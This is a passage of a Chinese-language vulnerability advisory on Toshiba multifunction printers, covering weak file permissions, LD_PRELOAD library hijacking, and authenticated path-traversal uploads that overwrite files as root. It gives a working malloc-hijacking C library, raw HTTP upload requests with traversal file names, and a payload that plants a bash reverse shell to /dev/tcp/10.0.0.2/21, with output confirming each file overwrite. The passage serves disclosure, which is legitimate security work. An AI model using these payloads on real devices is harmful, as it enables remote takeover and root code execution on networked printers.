4bc67000-4bda6000 r-xp 00000000 08:02 11750 /lib/libc-2.11.3.so
4bda6000-4bda7000 ---p 0013f000 08:02 11750 /lib/libc-2.11.3.so
4bda7000-4bda9000 r--p 0013f000 08:02 11750 /lib/libc-2.11.3.so
4bda9000-4bdaa000 rw-p 00141000 08:02 11750 /lib/libc-2.11.3.so
4bdaa000-4bdad000 rw-p 00000000 00:00 0
4bdaf000-4bdb1000 r-xp 00000000 08:02 11665 /lib/libdl-2.11.3.so
4bdb1000-4bdb2000 r--p 00001000 08:02 11665 /lib/libdl-2.11.3.so
4bdb2000-4bdb3000 rw-p 00002000 08:02 11665 /lib/libdl-2.11.3.so
4bdbf000-4bddf000 r-xp 00000000 08:02 139743 /usr/lib/libpcre.so.3.12.1
4bddf000-4bde0000 rw-p 0001f000 08:02 139743 /usr/lib/libpcre.so.3.12.1
4bdee000-4bdf0000 r-xp 00000000 08:02 144969 /usr/lib/libcom_err.so.2.1
4bdf0000-4bdf1000 rw-p 00001000 08:02 144969 /usr/lib/libcom_err.so.2.1
4bdfa000-4be0c000 r-xp 00000000 08:02 145525 /usr/lib/libz.so.1.2.3
4be0c000-4be0d000 rw-p 00011000 08:02 145525 /usr/lib/libz.so.1.2.3
4be0f000-4be12000 r-xp 00000000 08:02 144902 /usr/lib/libuuid.so.1.3.0
4be12000-4be13000 rw-p 00002000 08:02 144902 /usr/lib/libuuid.so.1.3.0
4be15000-4be1c000 r-xp 00000000 08:02 11732 /lib/librt-2.11.3.so
4be1c000-4be1d000 r--p 00006000 08:02 11732 /lib/librt-2.11.3.so
4be1d000-4be1e000 rw-p 00007000 08:02 11732 /lib/librt-2.11.3.so
4be7e000-4be9f000 r-xp 00000000 08:02 142900 /usr/lib/libk5crypto.so.3.1
4be9f000-4bea0000 rw-p 00021000 08:02 142900 /usr/lib/libk5crypto.so.3.1
4bea7000-4bead000 r-xp 00000000 08:02 140031 /usr/lib/libkrb5support.so.0.1
4bead000-4beae000 rw-p 00005000 08:02 140031 /usr/lib/libkrb5support.so.0.1
4c04f000-4c133000 r-xp 00000000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
4c133000-4c137000 r--p 000e4000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
4c137000-4c138000 rw-p 000e8000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
...
710a3000-710a5000 r-xp 00000000 08:02 153564 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so
710a5000-710a6000 rw-p 00001000 08:02 153564 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so
710a6000-710a9000 r-xp 00000000 08:02 154158 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so
710a9000-710aa000 rw-p 00002000 08:02 154158 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so
710aa000-710b4000 r-xp 00000000 08:02 154478 /home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so
710b4000-710b5000 rw-p 00009000 08:02 154478 /home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so
...
75674000-75677000 r--p 00064000 08:02 153751 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
75677000-7567b000 rw-p 00067000 08:02 153751 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
7567b000-756b0000 r-xp 00000000 08:02 154613 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
756b0000-756b3000 rw-p 00034000 08:02 154613 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
756b3000-756bd000 r-xp 00000000 08:02 11632 /lib/libpam.so.0.82.2
756bd000-756be000 rw-p 0000a000 08:02 11632 /lib/libpam.so.0.82.2
756be000-76217000 r-xp 00000000 08:02 21362 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
76217000-76258000 rw-p 00b58000 08:02 21362 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
76258000-7625f000 rw-p 00000000 00:00 0
7625f000-7626a000 r-xp 00000000 08:02 20801 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
7626a000-7626b000 rw-p 0000a000 08:02 20801 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
7626b000-76273000 r-xp 00000000 08:02 20878 /home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0
76273000-76274000 rw-p 00007000 08:02 20878 /home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0
76274000-76275000 ---p 00000000 00:00 0
76275000-76a74000 rwxp 00000000 00:00 0
76a74000-76a77000 rw-p 00000000 00:00 0
76a77000-76a7b000 r-xp 00000000 08:02 11633 /lib/libattr.so.1.1.0
76a7b000-76a7c000 rw-p 00003000 08:02 11633 /lib/libattr.so.1.1.0
76a7c000-76a82000 r-xp 00000000 08:02 11721 /lib/libacl.so.1.1.0
76a82000-76a83000 rw-p 00005000 08:02 11721 /lib/libacl.so.1.1.0
76a83000-76a84000 rw-p 00000000 00:00 0
76a84000-76af3000 r-xp 00000000 08:02 21782 /home/SYSROM_SRC/build/release/lib/libcios.so.0
76af3000-76af7000 rw-p 0006f000 08:02 21782 /home/SYSROM_SRC/build/release/lib/libcios.so.0
76af7000-76b50000 r-xp 00000000 08:02 145519 /usr/lib/libintlc.so.5
76b50000-76b53000 rw-p 00059000 08:02 145519 /usr/lib/libintlc.so.5
76b53000-76b5c000 r-xp 00000000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5c000-76b5d000 r--p 00008000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5d000-76b5e000 rw-p 00009000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5e000-76b85000 rw-p 00000000 00:00 0
76b85000-76b97000 r-xp 00000000 08:02 154448 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
76b97000-76b98000 rw-p 00012000 08:02 154448 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
76b98000-76b99000 rw-p 00000000 00:00 0
76b99000-76b9c000 r-xp 00000000 08:02 154186 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
76b9c000-76b9d000 rw-p 00002000 08:02 154186 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
76b9d000-76bc4000 r-xp 00000000 08:02 154600 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
76bc4000-76bc5000 rw-p 00027000 08:02 154600 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
76bc5000-76c64000 r-xp 00000000 08:02 154326 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
76c64000-76c67000 rw-p 0009f000 08:02 154326 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
76c67000-76c96000 r-xp 00000000 08:02 153499 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
76c96000-76c99000 rw-p 0002e000 08:02 153499 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
76c99000-76c9a000 rw-p 00000000 00:00 0
76c9a000-76d0b000 r-xp 00000000 08:02 153648 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
76d0b000-76d0d000 rw-p 00070000 08:02 153648 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
76d0d000-76d0e000 rw-p 00000000 00:00 0
76d0e000-76d4d000 r-xp 00000000 08:02 154400 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
76d4d000-76d4f000 rw-p 0003f000 08:02 154400 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
76d4f000-76d55000 r-xp 00000000 08:02 145615 /usr/lib/libirng.so
76d55000-76d58000 rw-p 00005000 08:02 145615 /usr/lib/libirng.so
76d58000-76d6b000 r-xp 00000000 08:02 21737 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
76d6b000-76d6c000 rw-p 00012000 08:02 21737 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
76d6c000-77568000 r-xp 00000000 08:02 157246 /mfp/lib/libsvml.so
77568000-77586000 rw-p 007fc000 08:02 157246 /mfp/lib/libsvml.so
77586000-77587000 rw-p 00000000 00:00 0
77587000-775ad000 r-xp 00000000 08:02 11746 /lib/libm-2.11.3.so
775ad000-775ae000 r--p 00025000 08:02 11746 /lib/libm-2.11.3.so
775ae000-775af000 rw-p 00026000 08:02 11746 /lib/libm-2.11.3.so
775af000-77624000 r-xp 00000000 08:02 145632 /usr/lib/libsqlite3.so.0.8.6
77624000-77626000 rw-p 00074000 08:02 145632 /usr/lib/libsqlite3.so.0.8.6
77626000-77627000 rw-p 00000000 00:00 0
77627000-77695000 r-xp 00000000 08:02 154620 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
77695000-77698000 rw-p 0006e000 08:02 154620 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
77698000-776ad000 r-xp 00000000 08:02 11629 /lib/libpthread-2.11.3.so
776ad000-776ae000 r--p 00014000 08:02 11629 /lib/libpthread-2.11.3.so
776ae000-776af000 rw-p 00015000 08:02 11629 /lib/libpthread-2.11.3.so
776af000-776b2000 rw-p 00000000 00:00 0
776b2000-776db000 r-xp 00000000 08:02 153455 /home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0
776db000-776dd000 rw-p 00028000 08:02 153455 /home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0
776dd000-776fb000 r-xp 00000000 08:02 154622 /home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1
776fb000-776fd000 rw-p 0001e000 08:02 154622 /home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1
776fd000-776fe000 rw-p 00000000 00:00 0
776fe000-77702000 r-xp 00000000 08:02 154313 /home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so
77702000-77703000 rw-p 00003000 08:02 154313 /home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so
77703000-77712000 r-xp 00000000 00:0d 10594 /ramdisk/al/libGetAddtInfoInterface.so
77712000-77714000 rw-p 0000e000 00:0d 10594 /ramdisk/al/libGetAddtInfoInterface.so
77714000-77715000 rw-p 00000000 00:00 0
77715000-77720000 r-xp 00000000 00:0d 11406 /ramdisk/al/libGetNameInfoInterface.so
77720000-77722000 rw-p 0000a000 00:0d 11406 /ramdisk/al/libGetNameInfoInterface.so由于权限较弱,我们可以覆盖数百个库来获取远程代码执行。
我们可以覆盖打印机内部运行的程序默认加载的 2 个库:
-
/ramdisk/al/libGetAddtInfoInterface.so -
/ramdisk/al/libGetNameInfoInterface.so
这两个库导出了英特尔优化的函数。
LD_PRELOAD 库中发现的导出函数:
kali% nm -D /home/user/research/printers/topaccess/4.50-latest-version/4.50-new-version/extract/home/SYSROM_SRC/build/release/lib/libGetNameInfoInterface.so.0
0000cf40 A __bss_start
00009150 T __cacheSize
w __cxa_finalize@GLIBC_2.1.3
U dlsym@GLIBC_2.0
0000cf40 A _edata
0000cfc0 A _end
00009d04 T _fini
00002340 T getnameinfo
00002290 T getNameInfoWrapper
w __gmon_start__
00002088 T _init
00009cb0 T __intel_f2int
00002530 T _intel_fast_memcpy
00002440 T _intel_fast_memcpy.A
00002500 T _intel_fast_memcpy.H
00002470 T _intel_fast_memcpy.J
000024a0 T _intel_fast_memcpy.M
000024d0 T _intel_fast_memcpy.P
000026f0 T _intel_fast_memset
00002600 T _intel_fast_memset.A
00002660 T _intel_fast_memset.H
00002630 T _intel_fast_memset.J
00002690 T _intel_fast_memset.M
000026c0 T _intel_fast_memset.P
000027cc T __intel_memcpy
000033fd T __intel_memset
000027c0 T __intel_new_memcpy
00003b10 T __intel_new_memcpy_P3
000033f0 T __intel_new_memset
00004a90 T __intel_new_memset_P3
000051e0 T __intel_sse2_memset
00005850 T __intel_sse2_rep_memset
00005dd0 T __intel_ssse3_memcpy
00007dc0 T __intel_ssse3_rep_memcpy
w _Jv_RegisterClasses
U memcpy@GLIBC_2.0
U memset@GLIBC_2.0
U pthread_create@GLIBC_2.1
U pthread_join@GLIBC_2.0
kali% nm -D /home/user/research/printers/topaccess/4.50-latest-version/4.50-new-version/extract/home/SYSROM_SRC/build/release/lib/libGetNameInfoInterface.so.0
0000cf40 A __bss_start
00009150 T __cacheSize
w __cxa_finalize@GLIBC_2.1.3
U dlsym@GLIBC_2.0
0000cf40 A _edata
0000cfc0 A _end
00009d04 T _fini
00002340 T getnameinfo
00002290 T getNameInfoWrapper
w __gmon_start__
00002088 T _init
00009cb0 T __intel_f2int
00002530 T _intel_fast_memcpy
00002440 T _intel_fast_memcpy.A
00002500 T _intel_fast_memcpy.H
00002470 T _intel_fast_memcpy.J
000024a0 T _intel_fast_memcpy.M
000024d0 T _intel_fast_memcpy.P
000026f0 T _intel_fast_memset
00002600 T _intel_fast_memset.A
00002660 T _intel_fast_memset.H
00002630 T _intel_fast_memset.J
00002690 T _intel_fast_memset.M
000026c0 T _intel_fast_memset.P
000027cc T __intel_memcpy
000033fd T __intel_memset
000027c0 T __intel_new_memcpy
00003b10 T __intel_new_memcpy_P3
000033f0 T __intel_new_memset
00004a90 T __intel_new_memset_P3
000051e0 T __intel_sse2_memset
00005850 T __intel_sse2_rep_memset
00005dd0 T __intel_ssse3_memcpy
00007dc0 T __intel_ssse3_rep_memcpy
w _Jv_RegisterClasses
U memcpy@GLIBC_2.0
U memset@GLIBC_2.0
U pthread_create@GLIBC_2.1
U pthread_join@GLIBC_2.0
kali%攻击者可以创建一个新的库并导出任何程序将使用的函数,例如malloc()。
编写了一个自定义库,劫持了malloc()函数的控制流:
kali% cat Makefile
all:
rm /home/user/research/printers/topaccess/malloc/malloc.so
gcc -o malloc.so -m32 -shared -fPIC malloc.c
kali% cat malloc.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
void *malloc(size_t size)
{
static void *(*fptr)(size_t) = NULL;
if (fptr == NULL)
{
fptr = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
if (fptr == NULL)
{
printf("dlsym: %sn", dlerror());
return NULL;
}
}
system("LD_PRELOAD='' id > /dev/shm/id");
return (*fptr)(size);
}
kali% make
rm /home/user/research/printers/topaccess/malloc/malloc.so
gcc -o malloc.so -m32 -shared -fPIC malloc.c
kali% ls -la
total 32
drwx------ 2 user user 4096 May 13 11:04 .
drwx------ 4 user user 4096 May 13 11:02 ..
-rw------- 1 user user 112 May 13 11:04 Makefile
-rw------- 1 user user 398 May 13 11:03 malloc.c
-rwx------ 1 user user 14696 May 13 11:04 malloc.so
kali%当将此库上传为/ramdisk/al/libGetAddtInfoInterface.so或 时/ramdisk/al/libGetNameInfoInterface.so,该malloc()功能将由打印机内部运行的某些程序执行,并且 id 命令将以 root 身份执行(输出将写入/dev/shm/id)。
副作用是很多程序也会崩溃。恶意负载的执行仍会有效。
通过仅针对 Apache 使用的特定功能或打印机内的特定程序,可以避免程序崩溃。
获取远程代码执行的其他方法
攻击者可以利用其他漏洞来获取远程代码执行:
-
使用不安全的 PATH 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-path
-
使用不安全的 LD_PRELOAD 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-preload
-
使用不安全的 LD_LIBRARY_PATH 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-library-path
-
利用 106 个程序的不安全权限进行本地特权提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-106-programs
-
使用 CISSM 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-cissm
攻击者可以远程攻击任何东芝打印机。
攻击者可以覆盖任何不安全的文件(包括以 root 身份运行的程序和 Python 代码)。
详细信息 – 多次以 root 身份执行经过身份验证的远程代码执行
东芝打印机提供了几种使用管理员网页界面上传文件的方法。
本章中的漏洞类似于以root或apache预先认证的远程代码执行和多个本地权限提升,但需要在TopAccess界面上进行身份验证。
当管理员通过身份验证后,可以使用维护界面在 Web 界面内上传文档:
-
上传驱动程序文件;
-
上传 MAC PPD 文件;
-
上传 Unix 过滤器;
-
上传驱动程序包;
-
通讯录、邮箱、模板的上传;
-
上传 SSL 证书;
-
…
在管理界面中可以找到几个带有上传表单的网页:
-
http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html
-
http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html
-
http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html
-
http://printer-ip/Administration/maintenance/uploadsoft/MacList.html
-
http://printer-ip/Administration/maintenance/import/ImportListFrame.html
-
http://printer-ip/Administration/Languages/InstallLanguagesUpload.html
-
http://printer-ip/Administration/AdminRegistration/ImageIconManagementFrame.html
-
http://printer-ip/Administration/Cloning/CloneFileUpload.html
-
http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html
-
http://printer-ip/Administration/maintenance/uploadsoft/MacList.html
-
http://printer-ip/Administration/maintenance/uploadsoft/PointAndPrintList.html
-
http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html
-
http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html
-
http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html
-
http://printer-ip/Administration/maintenance/import/ImportListFrame.html
-
http://printer-ip/Administration/maintenance/backup/BackupList.html
-
http://printer-ip/Administration/Security/Certificates/CertUpload.html
-
http://printer-ip/Administration/MetaScan/XMLFormatFile/XmlFormatList.html
-
http://printer-ip/Administration/Setup/setting/DDNSUpload.html
-
http://printer-ip/Administration/Setup/ServerConnErrRegFileUpload.html
-
http://printer-ip/Administration/Setup/PDLUpload.html
-
http://printer-ip/Administration/Setup/ICCProfile/ImportICCProfile.html
-
http://printer-ip/Administration/SystemUpdates/nSystemUpdatesUpload.html
所有这些上传功能都存在漏洞:它们允许具有管理员权限的攻击者覆盖打印机中存在的任何文件。
该漏洞可能存在于实现 API 的/home/SYSROM_SRC/build/release/lib/mod_contentwebserver.so.0库中。因此,这是一个可通过使用不同的上传表单来实现的独特漏洞。/contentwebserver/upload
例如,我们可以看到3种不同类型的上传表单:
驱动程序文件上传
Unix 过滤器的上传
上传通讯录、邮箱和模板
所有这些表单都存在漏洞,攻击者可以通过伪造一个恶意name值来利用该漏洞,如下图所示。攻击者可以通过修改名称值来更改 HTTP 请求,从而重写打印机中的任何文件。
例如,可以/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver通过使用名称值发送恶意文件来覆盖shell脚本/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver:
上传恶意 ldapserver shell 脚本:
需要更新 cookie 和 CsrfpId 值:
POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136357212815291094282690264320
Content-Length: 1056
Origin: http://10.0.0.1:8081
Connection: close
Referer: http://10.0.0.1:8081/Administration/maintenance/uploadsoft/DriverCustomize.html?v=1670278837ta&fileMode=3
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW; IgnoreSessionTimeout=1; Session=10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3; clicked=0; addrLastVisited=FAVGRP
Upgrade-Insecure-Requests: 1
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"
frames[0].formSubmitCompleteUploadList
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="DeviceInformationModel"
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>script.zip</File><name>Upload</name></source><destination><name>PDPlugin</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="CsrfpId"
10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver"; filename="script.zip"
Content-Type: application/zip
#!/bin/sh
bash -i >& /dev/tcp/10.0.0.2/21 0>&1
-----------------------------136357212815291094282690264320--根据此 HTTP 请求,该文件/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver将被恶意负载覆盖。
在执行HTTP请求之前,该文件是正常的:
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
-rwxrwxrwx 1 root root 7007 Mar 15 11:45 /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
bash-4.1# head /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
#!/bin/bash
LDAP_STARTUP_STATUS=0;
function stop() {
echo "slapd is stopped"
kill -SIGINT `pgrep slapd`
check_stop_process
}
function start() {
bash-4.1#执行 HTTP 请求后,该文件已被修改。它现在包含恶意负载:
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
-rw-rw-rw- 1 apache trusted 52 May 27 16:35 /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
bash-4.1# cat /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
#!/bin/sh
bash -i >& /dev/tcp/10.0.0.2/21 0>&1
bash-4.1#下面显示了另一种形式的利用,使用驱动程序上传。它利用了相同的漏洞。该文件/home/SYSROM_SRC/sbin/malicious.program将包含test:
上传/home/SYSROM_SRC/sbin/malicious.program:
POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------8960912535828260861374302822
Content-Length: 1813
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/UnixList.html?v=1517352288ta&fileMode=2
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW; TopAccessURL=http%3A//10.0.0.1%3A8080/%3FMAIN%3DTOPACCESS; SessionID=Session_3e61919e-556b-4be7-8a18-91bb65a4752b; clicked=0; addrLastVisited=ADDRBK; IgnoreSessionTimeout=1; Session=10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee
Upgrade-Insecure-Requests: 1
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"
frames[0].formSubmitCompleteUploadList
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="DeviceInformationModel"
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>aix.tar</File><name>Upload</name></source><destination><name>Unix-Filters</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="CsrfpId"
10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program"; filename="aix.tar"
Content-Type: application/x-tar
test
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="hpux.tar"; filename=""
Content-Type: application/octet-stream
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="hpux64.tar"; filename=""
Content-Type: application/octet-stream
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="linux.tar"; filename=""
Content-Type: application/octet-stream
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="openunix.tar"; filename=""
Content-Type: application/octet-stream
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="solaris.tar"; filename=""
Content-Type: application/octet-stream
-----------------------------8960912535828260861374302822--我们可以确认该文件已经上传到打印机:
bash-4.1# ls -la /home/SYSROM_SRC/sbin/malicious.program
-rw-rw-rw- 1 apache trusted 5 May 27 07:48 /home/SYSROM_SRC/sbin/malicious.program
bash-4.1#此漏洞可通过多种不同方式用于远程代码执行。由于东芝打印机中存在一些漏洞,因此有数百种不同的方法可以实现远程代码执行。例如:
-
上传LD_PRELOAD变量中定义的恶意库:
-
/ramdisk/al/libGetNameInfoInterface.so 或 /ramdisk/al/libGetAddtInfoInterface.so 可能被恶意库覆盖
-
使用 LD_LIBRARY_PATH 变量上传恶意库 – 攻击者可以在以下位置上传恶意库:
-
/home/SYSROM_SRC/build/release/lib,
-
/mfp/lib,
-
/homeSYSROM_SRC/NoBuildItems/common/lib,
-
/home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,
-
/home/SYSROM_SRC/build/release/lib。
-
由于不安全的权限而上传恶意程序:
-
如在106 个程序使用不安全权限进行本地特权提升和远程代码执行中所示,许多以 root 身份运行的程序可能会因不安全的权限而被覆盖 (777)
-
上传恶意 Python 程序或恶意 Python 库
-
替换 Bash 脚本
-
…
具有管理员权限的攻击者可以远程攻击任何东芝打印机。
具有管理员权限的攻击者可以覆盖任何不安全的文件(包括以 root 身份运行的程序和 Python 代码)。
详细信息 – 缺乏权限分离
东芝打印机未实施权限分离。攻击者只要攻陷一个程序就能攻陷整个打印机。
例如,除 Apache 之外的所有程序都以 root 身份运行。
Apache 并未以 root 身份运行,但可以利用以下漏洞之一实现本地权限提升:
-
使用 snmpd 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-snmpd
-
使用不安全的 PATH 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-path
-
使用不安全的 LD_PRELOAD 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-preload
-
使用不安全的 LD_LIBRARY_PATH 进行本地权限提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-library-path
-
利用 106 个程序的不安全权限进行本地特权提升和远程代码执行
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-106-programs
打印机上的进程列表:
bash-4.1# ps auxw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1740 512 ? Ss 16:34 0:00 init [3]
root 2 0.0 0.0 0 0 ? S 16:34 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 16:34 0:00 [ksoftirqd/0]
[...]
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00 /home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f /home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02 /home/SYSROM_SRC/bin/mapper firstboot=0
root 1482 0.0 0.0 26120 2628 ? Ss 16:34 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
apache 1486 0.0 0.1 1264444 3728 ? Sl 16:34 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
[...]
root 1757 0.0 0.2 34388 8176 ? S 16:34 0:00 ./cipollproc
root 1758 0.0 0.2 34432 8180 ? S< 16:34 0:00 ./ciprioritymanager
root 1785 0.3 1.9 815004 59476 ? Sl 16:34 0:51 ./ebx_dl 1539 1537 1540 1 2 3 -T8
root 1786 0.0 0.5 101584 15612 ? S 16:34 0:00 ./de_ipfax 1539 1537 1540 1 2 3 -T8
root 1803 0.0 0.3 38908 9448 ? S 16:34 0:00 ./alnfcplugin
root 1846 0.0 0.0 15544 2788 ? S 16:34 0:00 /home/SYSROM_SRC/bin/eBXDebugLogUtility
root 1850 0.0 0.0 1744 500 ttyS0 Ss+ 16:34 0:00 /sbin/getty 115200 ttyS0
root 1864 0.0 0.4 46528 13060 ? S 16:34 0:00 ./alfilestoragem -T8
root 1866 0.0 0.6 60164 18036 ? S 16:34 0:00 ./alusermgr
root 1867 0.0 0.4 44120 14156 ? S 16:34 0:00 ./allicensemgmt
root 1868 0.0 0.6 56792 18680 ? Sl 16:34 0:00 ./aldeviceserviceplugin
root 1869 0.0 1.4 84708 42192 ? S 16:34 0:03 ./aldeviceconfigplugin
root 1870 0.0 0.6 60856 20516 ? S 16:34 0:01 ./aluserAuthMgr
root 1871 0.0 0.3 41912 11224 ? S 16:34 0:00 ./algrpmgr
root 1872 0.0 0.4 43616 13080 ? S 16:34 0:00 ./alrolemgr
root 1873 0.0 0.5 54708 14972 ? Sl 16:34 0:05 ./alrestrictionmode
root 1874 0.0 0.5 61692 15364 ? Sl 16:34 0:00 ./alsecurityconfiguration
root 1875 0.0 0.3 41408 11008 ? S 16:34 0:00 ./alintegritychkmgr
root 1876 0.3 3.6 482584 108060 ? Sl 16:34 0:43 ./alUiFrameWork legacy -S ramdisk
root 1877 0.0 0.9 92276 26968 ? Sl 16:34 0:01 ./alpanel panel 49 Controller/Settings/autoClear Controller/Information/Locale -T4
root 1878 0.0 0.4 60888 14588 ? S 16:34 0:00 ./aljobtemplatemgr
